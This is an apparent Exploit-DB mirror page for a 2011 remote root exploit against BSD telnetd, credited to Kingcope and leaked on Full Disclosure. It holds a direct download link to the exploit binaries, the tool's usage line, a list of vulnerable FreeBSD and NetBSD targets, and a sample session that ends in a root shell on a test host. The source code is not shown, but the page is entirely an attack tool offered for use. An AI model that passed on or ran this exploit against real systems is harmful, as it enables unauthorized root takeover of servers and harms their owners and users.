53 lines
No EOL
1.5 KiB
Text
53 lines
No EOL
1.5 KiB
Text
This exploit was leaked on the Full Disclosure mailing list:
|
|
|
|
http://seclists.org/fulldisclosure/2012/Jun/404
|
|
|
|
|
|
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19520.zip
|
|
|
|
|
|
BSD telnetd Remote Root Exploit *ZERODAY*
|
|
By Kingcope
|
|
Year 2011
|
|
|
|
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
|
|
[-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s
|
|
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name
|
|
[port]]
|
|
TARGETS:
|
|
0 FreeBSD 8.2 i386
|
|
1 FreeBSD 8.0/8.1/8.2 i386
|
|
2 FreeBSD 7.3/7.4 i386
|
|
3 FreeBSD 6.2/6.3/6.4 i386
|
|
4 FreeBSD 5.3/5.5 i386
|
|
5 FreeBSD 4.9/4.11 i386
|
|
6 NetBSD 5.0/5.1 i386
|
|
7 NetBSD 4.0 i386
|
|
8 FreeBSD 8.2 amd64
|
|
9 FreeBSD 8.0/8.1 amd64
|
|
10 FreeBSD 7.1/7.3/7.4 amd64
|
|
11 FreeBSD 7.1 amd64
|
|
12 FreeBSD 7.0 amd64
|
|
13 FreeBSD 6.4 amd64
|
|
14 FreeBSD 6.3 amd64
|
|
15 FreeBSD 6.2 amd64
|
|
16 FreeBSD 6.1 amd64
|
|
17 TESTING i386
|
|
18 TESTING amd64
|
|
Trying 192.168.2.8...
|
|
Connected to 192.168.2.8.
|
|
Escape character is '^]'.
|
|
Trying SRA secure login:
|
|
*** EXPLOITING REMOTE TELNETD
|
|
*** by Kingcope
|
|
*** Year 2011
|
|
USING TARGET -- FreeBSD 8.2 amd64
|
|
SC LEN: 30
|
|
ALEX-ALEX
|
|
6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
|
|
USER TTY FROM LOGIN@ IDLE WHAT
|
|
kcope pts/0 192.168.2.3 6:32PM 4 _su (csh)
|
|
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17
|
|
02:41:51 UTC 2011
|
|
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
|
|
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) |